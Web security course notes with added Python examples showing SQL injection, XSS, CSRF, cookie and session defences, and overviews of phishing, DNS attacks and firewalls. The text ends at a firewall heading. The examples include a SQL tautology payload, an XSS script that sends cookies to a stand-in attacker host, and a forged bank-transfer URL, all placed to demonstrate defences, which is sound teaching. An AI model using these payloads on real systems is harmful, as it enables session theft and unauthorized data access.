MOD 6 CSS
Web security
Web security focuses on protecting online information and systems from
unauthorized access, use, disclosure, disruption, modification, or destruction. It
involves various techniques and technologies to prevent attacks, maintain data
integrity, and ensure user privacy.
Key Concepts
• Confidentiality: Protecting sensitive information from unauthorized
disclosure.
• Integrity: Ensuring the accuracy and reliability of data.
• Availability: Maintaining the accessibility of systems and resources.
Common Web Security Threats:
1. Cross-Site Scripting (XSS):
Attackers inject malicious scripts into web pages viewed by users.
2. SQL Injection:
Attackers place SQL syntax in input that the application concatenates into
a database query, changing what the query does (bypassing logins, reading,
modifying or deleting data).
3. Cross-Site Request Forgery (CSRF):
Forces users to perform unwanted actions on web apps in which they're
authenticated.
4. Man-in-the-Middle (MitM) Attacks:
Interception of communication between client and server.
5. Clickjacking:
Trick users into clicking on something different from what they perceive.
6. Phishing:
Tricking users into providing sensitive information via fake web pages.
7. Session Hijacking:
Attacker takes over a valid session using stolen cookies or session IDs.
🔐 Principles of Secure Web Application Design (Short Version)
1. Input Validation & Sanitization
Ensure all user inputs are clean and safe to prevent attacks like SQL
injection and XSS.
2. Least Privilege
Give users and components only the access they need—nothing more.
3. Secure Coding
Follow best practices like avoiding hardcoded secrets, handling errors
safely, and using trusted libraries.
4. Regular Testing
Perform frequent security tests (e.g., code reviews, scans, penetration
tests) to catch and fix vulnerabilities early.
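The point about input validation and SQL injection, as an added Python example that is not part of the original notes. The table, the two rows and the attacker string are constructed for the demonstration; the contrast is between a query built by string concatenation and the same query passed as a parameter, with an allow-list check as a second layer.

```python
import re
import sqlite3

# Constructed in-memory database with sample rows (example data, not real accounts).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")],
    )
    return conn

def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # The query is built by string concatenation, so characters in the
    # input (quotes, OR, comment markers) are interpreted as SQL syntax.
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # Parameterised query: the driver passes the value separately from the
    # SQL text, so it can only ever be compared as data, never run as code.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()

# Input validation as a second layer: an allow-list of what a username may contain.
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")

def validate_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None

def demo() -> dict:
    conn = make_db()
    payload = "' OR '1'='1"  # classic tautology injection, constructed for the demo
    return {
        "vulnerable_rows": find_user_vulnerable(conn, payload),
        "safe_rows": find_user_safe(conn, payload),
        "payload_passes_validation": validate_username(payload),
    }

if __name__ == "__main__":
    print(demo())
```

With the payload the concatenated query becomes `WHERE username = '' OR '1'='1'` and returns every row; the parameterised query returns nothing because no username equals that literal string. Parameterisation is the primary defence; the regex only narrows what reaches the database and is not a substitute for it.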
User Authentication Methods and Best Practices:
1. Password-Based Authentication
This is the most common method where users log in using a username
and password. To improve security, users should create strong, unique
passwords, and systems must never store passwords in plain text: store
them with a salted, deliberately slow password hashing algorithm such as
bcrypt, scrypt or Argon2 (not a fast general-purpose hash like MD5 or
SHA-256), compare hashes in constant time, and rate-limit login attempts
so weak passwords cannot be guessed online.
2. Two-Factor Authentication (2FA)
2FA adds an extra layer of security by requiring two types of credentials,
typically something the user knows (a password) and something they
have (a code from an authenticator app, a hardware key, or a code sent
to their phone). It significantly reduces the risk of unauthorized access
from a stolen password alone. Codes sent by SMS are the weakest second
factor because they can be intercepted or obtained by SIM swapping;
authenticator apps and hardware keys are preferred.
3. Biometric Authentication
This method uses physical traits such as fingerprints, facial recognition,
or iris scans to verify identity. It's convenient and hard to share or
guess, but biometric templates must be stored and matched securely
(ideally on the user's device, never as raw images), because unlike a
password a fingerprint cannot be changed once it has leaked.
4. Security Token Authentication
Authentication tokens, either physical devices or authenticator apps,
generate time-based (TOTP) or event-based (HOTP) one-time codes from a
shared secret. These tokens enhance security, especially when combined
with passwords or in high-risk environments; the server must accept each
code only once and tolerate only a small amount of clock drift.
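Password storage and one-time codes as an added Python example, not code from the original notes. The notes name bcrypt; this example uses scrypt from the standard library (also salted and deliberately slow) so that it runs without extra packages, and implements HOTP/TOTP as specified in RFC 4226 and RFC 6238. The shared secret and user password are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import os
import struct

# --- Factor 1: password storage -------------------------------------------
# scrypt stands in for bcrypt here: salted, memory-hard, tunable cost.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)

def hash_password(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)                       # unique random salt per user
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$%s$%s" % (base64.b64encode(salt).decode(),
                             base64.b64encode(digest).decode())

def verify_password(password: str, stored: str) -> bool:
    try:
        algo, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, expected)     # constant-time comparison

# --- Factor 2: one-time codes (RFC 4226 HOTP / RFC 6238 TOTP) --------------
def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                              # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10**digits).zfill(digits)

def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    return hotp(secret, unix_time // step, digits)

def verify_totp(secret: bytes, code: str, unix_time: int,
                step: int = 30, window: int = 1) -> bool:
    # Accept the current step and +/- `window` steps to tolerate small clock drift.
    counter = unix_time // step
    return any(
        hmac.compare_digest(hotp(secret, c).encode(), code.encode())
        for c in range(counter - window, counter + window + 1)
    )

def authenticate(stored_hash: str, totp_secret: bytes,
                 password: str, code: str, unix_time: int) -> bool:
    # Both factors are always evaluated so that the response time does not
    # reveal which one failed.
    ok_password = verify_password(password, stored_hash)
    ok_code = verify_totp(totp_secret, code, unix_time)
    return ok_password and ok_code
```

A production server additionally records the last counter it accepted for each user so that a captured code cannot be replayed within the drift window, and rate-limits code attempts, since a six-digit code has only a million possibilities.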
Role of Cookies in Web Security
Cookies are small pieces of data stored in the user's browser, primarily used for
session management, personalization, and user tracking. They help websites
remember user activities and preferences, such as login states or language
settings. While cookies enhance user experience, they can also introduce
significant security risks if not properly managed.
Types of Cookies
1. Session Cookies
These are temporary cookies that are deleted once the browser is
closed. They are typically used for managing user sessions during active
browsing.
2. Persistent Cookies
These cookies remain stored on the user's device until they expire or are
manually deleted. They are often used for "remember me" tokens or user
preferences. They should hold a random token the server can revoke,
never the username and password themselves.
3. Secure Cookies
Cookies with the Secure attribute are sent by the browser only over
HTTPS connections, so they are never exposed on a plain-HTTP request
that an eavesdropper on the network could read. The flag does not
encrypt the cookie itself; the TLS connection does that.
4. HttpOnly Cookies
These cookies are inaccessible to JavaScript (document.cookie does not
return them), which helps protect them from being stolen via Cross-Site
Scripting (XSS) attacks. An XSS payload can still send requests that carry
the cookie from inside the victim's browser, so HttpOnly limits the
damage rather than removing it.
5. SameSite Cookies
The SameSite attribute (Strict or Lax) restricts cookies from being sent on
cross-site requests, thereby providing protection against Cross-Site
Request Forgery (CSRF) attacks. Lax still sends the cookie on top-level
navigations such as clicking a link, so state-changing actions must not be
performed via GET, and SameSite=None requires the Secure attribute.
Security Roles of Cookies
Cookies play an important role in several security-related aspects of web
applications:
Function: Role of Cookies
Session Management: Maintain user login state and track sessions across
multiple pages.
Authentication: Store tokens or session IDs to identify and authenticate
users.
Personalization: Save user preferences and settings for a customized
browsing experience.
Security Enhancements: Use flags like Secure, HttpOnly, and SameSite to
protect against common web attacks.
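Issuing a hardened session cookie and auditing a Set-Cookie header for the flags above, as an added Python example that is not part of the original notes. It uses only the standard library; the cookie name `sid` is an assumption.

```python
import secrets
from http.cookies import SimpleCookie
from typing import List, Optional

def new_session_id() -> str:
    # 256 bits from the OS CSPRNG: a session ID must be unguessable, not just unique.
    return secrets.token_urlsafe(32)

def build_session_cookie(session_id: str, max_age: Optional[int] = None) -> str:
    """Return the value of a Set-Cookie header for a hardened session cookie."""
    jar = SimpleCookie()
    jar["sid"] = session_id
    jar["sid"]["secure"] = True        # only sent over HTTPS
    jar["sid"]["httponly"] = True      # hidden from document.cookie
    jar["sid"]["samesite"] = "Lax"     # not attached to cross-site POSTs or subresources
    jar["sid"]["path"] = "/"
    if max_age is not None:            # omit for a session cookie (deleted on browser close)
        jar["sid"]["max-age"] = max_age
    return jar.output(header="").strip()

def audit_set_cookie(header_value: str) -> List[str]:
    """Return a list of problems found in a Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:                       # parts[0] is name=value
        name, _, value = part.partition("=")
        attrs[name.lower()] = value.lower()
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly")
    if "samesite" not in attrs:
        problems.append("missing SameSite")
    elif attrs["samesite"] == "none" and "secure" not in attrs:
        problems.append("SameSite=None requires Secure")
    return problems

if __name__ == "__main__":
    header = build_session_cookie(new_session_id(), max_age=3600)
    print("Set-Cookie:", header)
    print("problems:", audit_set_cookie(header))
    print("problems in a bare cookie:", audit_set_cookie("sid=abc; Path=/"))
```

The audit function is the check to run against any application's login response: a session cookie missing any of the three flags is exposed to network sniffing, XSS theft, or CSRF respectively.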
Security requirements of website
1. Confidentiality
Data Encryption: Sensitive data, such as login credentials, credit card
details, and personal information, should be encrypted both during
transmission (using protocols like HTTPS) and at rest (using proper
encryption algorithms).
Access Control: Only authorized users should be allowed to access
sensitive information. This can be enforced through authentication
mechanisms such as passwords, two-factor authentication (2FA), and
role-based access control (RBAC).
2. Integrity
Data Integrity: Ensure that data is not tampered with or modified
without proper authorization. This can be ensured by using hashing,
digital signatures, and integrity checks like HMAC (Hash-based Message
Authentication Code).
Input Validation: Validate and sanitize all user inputs to prevent
malicious data from altering the server’s behavior or database integrity
(e.g., SQL injection, Cross-Site Scripting (XSS)).
3. Availability
DDoS Protection: Implement measures such as load balancing, rate
limiting, and firewalls to protect the website from Distributed Denial-of-
Service (DDoS) attacks that could overwhelm the server.
Backup Systems: Regular backups and redundant server setups (such as
failover systems) should be in place to recover from attacks or server
failures quickly.
4. Authentication & Authorization
Strong Authentication: Use strong, multi-factor authentication (MFA)
mechanisms, especially for critical or sensitive areas of the website.
Authorization Checks: Implement fine-grained authorization policies to
ensure users can only access resources they are permitted to. This may
involve different levels of user roles (admin, user, guest) and access
restrictions.
5. Non-Repudiation
Logging and Monitoring: Maintain detailed logs of user activities, system
events, and security-related events (such as failed login attempts). This
allows actions to be traced back to an authenticated identity so that
users cannot plausibly deny them.
Audit Trails: Keep a tamper-evident record (append-only or signed) of
changes made to sensitive data, system configurations, and important
transactions, so that users and administrators cannot credibly deny their
actions.
6. Accountability
User and Admin Monitoring: Monitor user activity and administrative
actions to detect unauthorized access or abnormal behavior patterns.
Tools like intrusion detection systems (IDS) and user behavior analytics
(UBA) can be used.
Role-Based Access Control (RBAC): Ensure that users only have access to
what they need to perform their job functions, minimizing the potential
damage of compromised accounts.
7. Privacy
Data Minimization: Only collect necessary information from users. Avoid
storing sensitive information like passwords or credit card numbers
unless absolutely necessary, and make sure it is encrypted if stored.
Privacy Policies: Clearly communicate how user data is being used,
stored, and protected through privacy policies and compliance with
privacy regulations such as GDPR.
8. Vulnerability Management
Patch Management: Keep software, including web servers, application
frameworks, and third-party libraries, up to date with the latest security
patches.
Regular Vulnerability Scanning: Perform regular security assessments,
including vulnerability scans and penetration testing, to identify and fix
potential weaknesses.
9. Secure Coding Practices
Code Reviews: Conduct code reviews to ensure that security
vulnerabilities are identified and resolved early in the development
process.
Sanitize Inputs: Always validate user input and encode output to avoid
injection attacks like SQL injection and XSS. CSRF is not an injection flaw
and needs its own defences (anti-CSRF tokens, SameSite cookies, origin
checks).
Aspect: HTTP vs HTTPS
Full Form: HTTP is HyperText Transfer Protocol; HTTPS is HyperText
Transfer Protocol Secure.
Security: HTTP is not secure, data is transferred in plain text; HTTPS uses
encryption to protect data.
Encryption: HTTP has no encryption; HTTPS encrypts data using SSL/TLS
(in practice TLS 1.2 or 1.3 today, since SSL is obsolete).
Port: HTTP uses port 80; HTTPS uses port 443.
Protocol: HTTP is the plain HTTP protocol; HTTPS is HTTP carried over an
SSL/TLS connection.
SSL/TLS: HTTP does not use SSL/TLS; HTTPS uses SSL/TLS to ensure data
privacy and integrity.
Data Integrity: With HTTP, data can be tampered with in transit; HTTPS
detects tampering and rejects modified data.
Authentication: HTTP has no authentication of the server; HTTPS verifies
the server's identity through its X.509 certificate.
Performance: HTTP is marginally faster because it has no encryption
overhead; HTTPS is slightly slower due to the TLS handshake and
encryption, which is negligible on modern hardware.
Use Cases: HTTP was used for non-sensitive, public data (e.g., blogs,
informational websites); HTTPS is used for secure transactions (e.g.,
online banking, e-commerce sites) and is now the default for all sites.
URL Prefix: HTTP URLs begin with http://; HTTPS URLs begin with https://.
Trust: HTTP provides no verification of authenticity; HTTPS provides trust
with certificates issued by trusted certificate authorities (CAs).
Web browser attacks
Web browser attacks target vulnerabilities in web browsers or their
components to compromise the user's system, steal data, or manipulate web
traffic. Here are some common web browser attacks:
1. Cross-Site Scripting (XSS)
Description: An attacker injects malicious scripts into web pages viewed
by users, typically via input fields. These scripts are then executed in the
victim's browser.
Impact: Can steal session cookies, hijack user sessions, deface websites,
or redirect users to malicious websites.
Prevention: Encode output for the context it is placed in (HTML body,
attribute, JavaScript, URL), validate input, set a Content Security Policy
(CSP), and mark session cookies HttpOnly.
2. Cross-Site Request Forgery (CSRF)
Description: The attacker tricks the user into executing unwanted actions
on a website where they are authenticated, such as changing account
settings or transferring funds.
Impact: Can perform malicious actions on behalf of the victim without
their consent.
Prevention: Use anti-CSRF tokens, SameSite cookies, and validate the
origin of requests.
3. Phishing
Description: The attacker impersonates a trustworthy entity via a fake
website, email, or message to steal sensitive information like usernames,
passwords, and credit card details.
Impact: Compromised accounts and stolen personal information.
Prevention: Awareness training, anti-phishing browser extensions, and
using secure (HTTPS) websites.
4. Man-in-the-Middle (MITM) Attack
Description: An attacker intercepts and potentially alters
communications between the user and a website. This often occurs over
unsecured networks (e.g., public Wi-Fi).
Impact: Data interception, session hijacking, or injecting malicious
content into the communication.
Prevention: Use HTTPS for encrypted communication, avoid using public
Wi-Fi for sensitive activities, and employ VPNs.
5. Drive-By Downloads
Description: Malicious software is automatically downloaded to a user's
computer when visiting a compromised or malicious website.
Impact: Installation of malware such as viruses, Trojans, or ransomware.
Prevention: Keep browsers and plugins up to date, use antivirus
software, and disable JavaScript in untrusted sources.
6. Clickjacking
Description: An attacker tricks the user into clicking on something
different from what they perceive by overlaying transparent or disguised
content over a legitimate webpage.
Impact: Can lead to unintended actions, such as liking a social media
page, downloading malicious files, or transferring funds.
Prevention: Use the X-Frame-Options header (DENY or SAMEORIGIN) or
the CSP frame-ancestors directive to prevent the website from being
embedded in an iframe by other sites.
Prevention Measures for Browser Attacks:
1. Use HTTPS for secure communication.
2. Update browsers and plugins regularly to patch security flaws.
3. Install anti-malware and antivirus software to detect and block
malicious content.
4. Educate users about phishing and suspicious behavior.
5. Disable unnecessary browser features, such as Flash, Java, or
unnecessary extensions.
Clickjacking
Definition: Clickjacking is a malicious technique where an attacker tricks
a user into clicking something different from what they perceive, by
overlaying a transparent or disguised element on a web page.
How It Works: The attacker creates a hidden or disguised layer (like a
button or an invisible iframe) over a legitimate web page, causing the
user to unknowingly click on the malicious element. For instance, the
user may think they are clicking on a harmless button, but instead, they
are interacting with a hidden element controlled by the attacker.
Impact: Clickjacking can lead to unintended actions, such as:
o Liking a page on social media.
o Initiating a transaction or making a payment.
o Submitting sensitive information without the user’s knowledge.
Prevention:
o Use the X-Frame-Options header to prevent your website from
being embedded in iframes.
o Implement a Content Security Policy (CSP) to restrict where your
website can be loaded.
o Educate users not to click on suspicious links or buttons.
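Output encoding against XSS and the anti-framing response headers against clickjacking, as one added Python example covering both sections; it is not code from the original notes. The comment payload and the nonce are constructed for the demonstration.

```python
import html
from typing import Dict

def render_comment_vulnerable(comment: str) -> str:
    # Untrusted text is concatenated straight into the page, so any tag in
    # it becomes part of the page and runs in every viewer's browser.
    return '<p class="comment">' + comment + "</p>"

def render_comment_safe(comment: str) -> str:
    # Escaping < > & " ' for the HTML text/attribute context turns markup
    # into literal text. Other contexts (JavaScript, URL) need their own encoders.
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"

def security_headers(script_nonce: str) -> Dict[str, str]:
    """Response headers that limit injected scripts and forbid framing."""
    csp = "; ".join([
        "default-src 'self'",
        f"script-src 'self' 'nonce-{script_nonce}'",  # inline scripts run only with the per-response nonce
        "object-src 'none'",
        "frame-ancestors 'none'",                       # modern anti-clickjacking directive
        "base-uri 'self'",
    ])
    return {
        "Content-Security-Policy": csp,
        "X-Frame-Options": "DENY",                      # legacy header for older browsers
    }

def can_be_framed(headers: Dict[str, str]) -> bool:
    """True if nothing in the response forbids embedding it in an iframe.
    Simplification: any frame-ancestors directive is treated as restrictive;
    a full checker would parse its source list."""
    lower = {k.lower(): v for k, v in headers.items()}
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    csp = lower.get("content-security-policy", "").lower()
    return "frame-ancestors" not in csp

def looks_like_script(rendered_html: str) -> bool:
    return "<script" in rendered_html.lower()

if __name__ == "__main__":
    payload = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
    print(render_comment_vulnerable(payload))
    print(render_comment_safe(payload))
    print(security_headers("d2ViLXNlYw"))
```

`can_be_framed` is the quick check to run over a target's response headers during a review: a page that returns neither header can be loaded invisibly over an attacker's page.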
Session Hijacking
Definition: Session hijacking occurs when an attacker steals a valid
session token (such as a session cookie or authentication token) and
impersonates the user to gain unauthorized access to their session.
How It Works: The attacker intercepts or steals the user’s session ID
(often through methods like man-in-the-middle attacks, network sniffing,
or exploiting weak session management) and uses it to take over the
user’s session. This can occur if a user’s session is transmitted over an
unsecured network (like public Wi-Fi) or if their session is not properly
protected.
Impact: Session hijacking can lead to:
o Unauthorized access to user accounts (e.g., email, banking, social
media).
o Data theft or the ability to perform malicious actions in the name
of the user.
o Loss of trust in the website or web application.
Prevention:
o Use HTTPS to encrypt all communications and prevent session
data from being intercepted.
o Implement Secure and HttpOnly flags on session cookies to
prevent unauthorized access via JavaScript or insecure channels.
o Regenerate session IDs after login and after any privilege change, so
that an ID an attacker planted or captured before login (session fixation)
cannot be reused; invalidate the session server-side on logout and
expire idle sessions.
o Enable Multi-Factor Authentication (MFA) to provide an
additional layer of security beyond just the session ID.
Cross-Site Request Forgery (CSRF)
Definition:
Cross-Site Request Forgery (CSRF) is a type of attack where a malicious actor
tricks a user's browser into performing actions on a web application that the
user is authenticated on, without the user's consent. This attack takes
advantage of the fact that browsers automatically attach cookies (and HTTP
Basic credentials) to every request to a site, regardless of which page
initiated the request, so a request forged from the attacker's page arrives
carrying the victim's session. Tokens that the application sends in a custom
header (for example a bearer token) are not attached automatically, which is
why such APIs are far less exposed.
How it Works:
1. Victim's Session: The attacker targets a user who is already logged into a
trusted website (e.g., a banking site, email, or social media).
2. Malicious Request: The attacker crafts a malicious request (e.g.,
changing account details, transferring funds) and embeds it in a
webpage, email, or third-party site. The request is often hidden inside an
image, script, or link.
3. Victim Executes Request: When the victim visits the malicious page or
clicks on the link, their browser sends the forged request to the trusted
site, along with the user's session cookies or tokens.
4. Action Performed: Since the website cannot differentiate between a
legitimate user action and the forged one, it processes the malicious
request as if the user intentionally performed it.
Impact:
Account Compromise: The attacker can cause the user to perform
unintended actions such as changing the account email, transferring
funds, or even deleting data.
Loss of Funds: For websites like online banking, CSRF can lead to
unauthorized money transfers.
User Privacy Violations: It can compromise the privacy of users by
allowing attackers to alter their settings or actions.
Example Attack:
Imagine a banking website where a user can transfer funds using a URL
like this:
https://bank.com/transfer?amount=1000&toAccount=attackerAccount
If the user is logged into the banking site, an attacker could create a
web page that includes an image tag or a form pointing at the above
URL. When the victim visits the page, their browser will send the
request to the bank along with the session cookie, transferring money
to the attacker's account without the user's consent. Performing a
state-changing action in response to a GET request is itself a design
flaw; even with POST, the attacker's page can auto-submit a hidden
form, so a CSRF token is still needed.
Prevention:
Anti-CSRF Tokens: a random per-session (or per-form) secret embedded in
each form and checked on every state-changing request; the attacker's
page cannot read it.
SameSite Cookies: SameSite=Lax or Strict stops the browser attaching the
session cookie to cross-site requests.
Request Validation: check the Origin (or Referer) header against the site's
own origin and accept only POST for state-changing actions.
Requiring Re-authentication: ask for the password or a second factor
before sensitive actions such as transfers or email changes.
Content Security Policy (CSP): limits injected scripts and framing, which
reduces related attacks, but it does not by itself stop CSRF.
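The session-hijacking defences (regenerating the ID on login, invalidating on logout) and the CSRF defences (POST only, origin check, anti-CSRF token) together, as one added Python example that serves both sections; it is not code from the original notes. The `Request` class, the in-memory `sessions` store, the ledger and the origin `https://bank.example` are constructed for the demonstration; a framework would supply the request object and the session backend.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SITE_ORIGIN = "https://bank.example"   # hypothetical origin for the demo

# Server-side session store: session ID -> session data (constructed for the demo).
sessions: Dict[str, dict] = {}

def create_session(user: Optional[str] = None) -> str:
    sid = secrets.token_urlsafe(32)
    sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid

def login(old_sid: Optional[str], user: str) -> str:
    # Regenerate the ID on login: an ID the attacker planted (fixation) or
    # captured (hijacking) before authentication is now worthless, and the
    # new session gets a fresh CSRF token.
    if old_sid is not None:
        sessions.pop(old_sid, None)
    return create_session(user)

def logout(sid: str) -> None:
    sessions.pop(sid, None)   # invalidate server-side, not just clear the cookie

@dataclass
class Request:
    method: str
    cookies: Dict[str, str]
    form: Dict[str, str]
    headers: Dict[str, str] = field(default_factory=dict)

Ledger = List[Tuple[str, str, int]]

def transfer_vulnerable(req: Request, ledger: Ledger) -> int:
    """Honours any request carrying a logged-in session cookie, even a GET the
    browser sent because an attacker's page embedded the URL as an <img>."""
    sess = sessions.get(req.cookies.get("sid", ""))
    if not sess or not sess["user"]:
        return 401
    ledger.append((sess["user"], req.form["toAccount"], int(req.form["amount"])))
    return 200

def _same_origin(req: Request) -> bool:
    # Prefer Origin, fall back to Referer. Compare the whole origin, not a
    # prefix, or "https://bank.example.evil.test" would pass.
    value = req.headers.get("Origin") or req.headers.get("Referer", "")
    return value == SITE_ORIGIN or value.startswith(SITE_ORIGIN + "/")

def transfer_hardened(req: Request, ledger: Ledger) -> int:
    sess = sessions.get(req.cookies.get("sid", ""))
    if not sess or not sess["user"]:
        return 401
    if req.method != "POST":          # state changes never via GET
        return 405
    if not _same_origin(req):         # request validation
        return 403
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403                    # anti-CSRF token missing or wrong
    ledger.append((sess["user"], req.form["toAccount"], int(req.form["amount"])))
    return 200
```

Each check catches a different forgery: the method check stops the `<img>` trick, the origin check stops a plain cross-site form post, and the token stops anything else the attacker's page can construct, since the token is only visible to pages the bank itself served. A SameSite cookie (see the cookie section) adds a fourth, browser-side layer.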
Phishing: Definition
Phishing is a cyber attack where an attacker attempts to deceive individuals
into revealing sensitive information such as login credentials, credit card
numbers, or other personal details. This is typically done by impersonating a
trustworthy entity through fraudulent emails, websites, or other forms of
communication.
Common Types of Phishing Techniques
1. Email Phishing
o Description: The most common type of phishing, where an
attacker sends fraudulent emails that appear to come from
legitimate sources (e.g., banks, e-commerce sites, government
agencies).
o Goal: To trick recipients into clicking on malicious links,
downloading infected attachments, or revealing sensitive
information (login credentials, credit card numbers).
o Example: An email claiming that your bank account has been
compromised and asking you to click a link to "verify your
account."
2. Spear Phishing
o Description: A more targeted and personalized form of phishing,
where the attacker customizes the message to a specific individual
or organization, often using information gathered from social
media or public databases.
o Goal: To increase the likelihood of success by making the email
appear more credible and relevant to the target.
o Example: An email that appears to come from your boss, asking
you to urgently transfer money or share sensitive information.
3. Whaling
o Description: A type of spear phishing that specifically targets high-
level executives or important individuals (often referred to as
"whales"), such as CEOs, CFOs, and other decision-makers in a
company.
o Goal: To steal highly sensitive corporate information or gain access
to company assets.
o Example: A fraudulent email that looks like an official
communication from a legal firm or financial institution asking for
a critical business action, such as wire transfers or signing
important documents.
4. Vishing (Voice Phishing)
o Description: Phishing attacks conducted over the phone, where
attackers impersonate legitimate entities (such as banks,
government agencies, or tech support) to gain personal
information.
o Goal: To manipulate the victim into revealing information like
credit card numbers, social security numbers, or account
passwords.
o Example: A call claiming to be from your bank’s fraud department,
asking you to verify account details to avoid suspension.
5. Smishing (SMS Phishing)
o Description: Phishing attacks that use SMS (text messages) to
deceive the recipient into clicking on a malicious link or calling a
fraudulent phone number.
o Goal: To steal personal information or install malware on the
victim’s device.
o Example: A text message claiming that you've won a prize, with a
link to "claim your reward," which leads to a fake website
designed to steal your login details.
Pharming: Pharming is a more technical attack that aims to redirect a user's
website request to a fraudulent site without their knowledge, even if they type
the correct web address. Unlike phishing, which relies on tricking the user into
visiting a fake site, pharming manipulates the system's DNS settings or takes
advantage of vulnerabilities in internet infrastructure to lead users to malicious
sites.
DNS Spoofing: This is a common pharming technique where the attacker
corrupts the DNS server's data to redirect users to fake websites, despite
them entering the correct URL.
Hosts File Modification: Attackers modify the local hosts file on a user's
computer to direct web requests to malicious sites without their
knowledge.
Preventive Measures Against Phishing
1. Enable Multi-Factor Authentication (MFA) and use strong, unique
passwords.
2. Verify sender details and check links for authenticity before clicking.
3. Ensure HTTPS on websites and avoid sharing sensitive info via email.
4. Use anti-phishing tools and keep software updated.
5. Monitor accounts regularly for suspicious activity and report phishing
attempts.
For Pharming:
Use secure DNS servers and employ DNS security extensions like DNSSEC
to prevent DNS spoofing.
Regularly update and patch software to protect against vulnerabilities
that could be exploited in pharming attacks.
DNS Attacks: Overview
DNS (Domain Name System) attacks target the infrastructure of the DNS, which
is responsible for translating domain names (like www.example.com) into IP
addresses that computers can understand. These attacks aim to disrupt or
manipulate the resolution process to compromise network security.
Common Types of DNS Attacks
1. DNS Spoofing (Cache Poisoning)
o Description: The attacker injects false DNS records into the cache
of a DNS resolver, causing it to return incorrect IP addresses.
o Impact: Users are directed to malicious websites instead of the
intended site, leading to potential data theft or malware infection.
2. DNS Amplification Attack
o Description: A type of DDoS (Distributed Denial of Service) attack
where an attacker sends small DNS queries to open resolvers with a
spoofed source IP address (the victim's IP). Each server sends its
much larger response to the victim, multiplying the attacker's
bandwidth.
o Impact: The victim's system is overwhelmed with massive
amounts of DNS traffic, causing service disruptions or network
outages.
3. DNS Hijacking
o Description: An attacker takes control of a victim's DNS settings,
redirecting their traffic to malicious websites.
o Impact: The victim is redirected to fake websites, leading to
phishing attacks or malware infections.
4. DNS Tunneling
o Description: Data is encoded within DNS queries and responses to
bypass network security measures, allowing attackers to send and
receive malicious data undetected.
o Impact: Allows attackers to exfiltrate data or maintain
communication with compromised systems.
5. DNS Flood Attack
o Description: A type of DDoS attack where the attacker floods a
DNS server with a high volume of DNS requests, overwhelming its
capacity.
o Impact: Causes a DNS server to become slow or unresponsive,
leading to service outages for users trying to access websites.
Preventive Measures Against DNS Attacks
1. Use DNSSEC (DNS Security Extensions): Signs DNS records so that
resolvers can verify their authenticity and integrity, defeating cache
poisoning. It does not encrypt queries and does not stop flood or
amplification attacks.
2. Implement Rate Limiting: Prevents abuse by limiting the number of
requests from a single source.
3. Configure DNS Filtering: Blocks malicious domains and prevents access
to phishing sites.
4. Monitor DNS Traffic: Use network monitoring tools to detect unusual
DNS request patterns.
5. Keep DNS Software Updated: Ensure that your DNS servers are patched
and protected against known vulnerabilities.
Firewall
A firewall is a network security device that monitors and controls incoming and
outgoing network traffic based on predetermined security rules. It acts as a
barrier between your trusted internal network and the untrusted external
network (like the Internet). Firewalls can be hardware, software, or a
combination of both, and they help prevent unauthorized access to or from a
private network.
Importance of Firewalls
Firewalls are essential because:
1. They protect internal networks that might not be secure on their own.
2. The Internet has many potential threats, like hackers, cybercriminals, and
malicious software.
3. They help prevent denial of service attacks and unauthorized access to
internal data.
4. They centralize network security, acting like a lock on the front door of a
house.
Types of Firewalls
Firewalls are generally classified into three types:
1. Packet-Filtering Firewalls (Stateless and Stateful)
o How it works: This type of firewall filters traffic based on criteria
like source and destination IP addresses, ports, and protocols. It
examines each data packet individually to decide whether to allow
or block it.
o Stateless Firewalls: They inspect packets without keeping track of
the connection state. They make decisions based solely on the
packet's data, which makes them faster but less secure.
o Stateful Firewalls: These firewalls track the state of active
connections, allowing only packets that are part of a known
connection. They are more secure than stateless firewalls because
they understand the context of the traffic.
2. Application-Level Firewalls (Proxies)
o How it works: An application-level firewall, also known as a proxy
firewall, filters traffic based on the specific application it is
associated with (like HTTP, FTP, or Telnet). It acts as an
intermediary, preventing direct communication between a trusted
network and an untrusted network.
o Features:
It examines packets at the application layer, verifying the
data being sent and received.
It can filter specific actions, like blocking certain commands
that could be harmful (e.g., blocking the 'FTP put' command
to prevent file uploads).
o Network Address Translation (NAT): It can replace the internal IP
address with its own when sending data to the outside world,
hiding internal network details.
3. Circuit-Level Firewalls
